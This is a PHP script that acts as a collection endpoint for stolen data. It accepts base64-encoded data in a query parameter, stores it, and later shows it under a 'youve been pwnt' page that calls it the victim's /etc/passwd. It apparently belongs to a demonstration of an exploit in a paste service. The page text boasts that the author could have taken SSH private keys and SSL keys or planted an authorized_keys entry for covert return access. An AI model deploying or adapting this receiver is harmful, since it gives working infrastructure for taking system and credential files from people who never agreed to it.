<?php
$pwnpath = '/home/anton/paste/pwns/';

$lecture = <<<EOF
<!doctype html>
<html>
<head>
<title>pwnt</title>
</head>
<body>
    <h2>youve been pwnt</h2>
    <hr>
    <p>
    I just stole your /etc/passwd. That isn't too bad, its just a list of users on your machine.. But I could just as easily have taken your <strong>SSH private key</strong>, <strong>SSL keys/certs</strong>, and <strong>any other data your account can read</strong>.
    </p>
    <p>
    <strong>Or...</strong> I could have <em>written</em> data instead. Such as adding a new private key to your ~/.ssh/authorized_keys file, so that I could <strong>sneak in later and wreak havoc</strong>. In fact, are you sure I didn't? ;)
    </p>
    <p>
    To see how that exploit was pulled off, read the source of <a href="http://antsar.rutgers.edu/paste">antsar.rutgers.edu/paste</a>
    <hr>
    <p>
    Here's your /etc/passwd file, for proof:
    </p>
    <pre>
EOF;

$htmlfoot = <<<EOF
    </pre>
</body>
</html>
EOF;

if (isset($_GET['d'])) {
    $id = uniqid();
    if ($dec = base64_decode($_GET['d'])) {
        file_put_contents($pwnpath.$id, $dec);
        echo "http://antsar.rutgers.edu/paste/p.php?id={$id}";
    } else {
        echo "oops, nevermind";
    }
} elseif (isset($_GET['id'])) {
    if (preg_match('/[^a-z_\-0-9]/i', $_GET['id'])) {
        die('invalid id');
    } else {
        $id = $_GET['id'];
        if (file_exists($pwnpath.$id)) {
            echo $lecture;
            echo file_get_contents($pwnpath.$id);
            echo $htmlfoot;
        } else {
            die('invalid id');
        }
    }
}

?>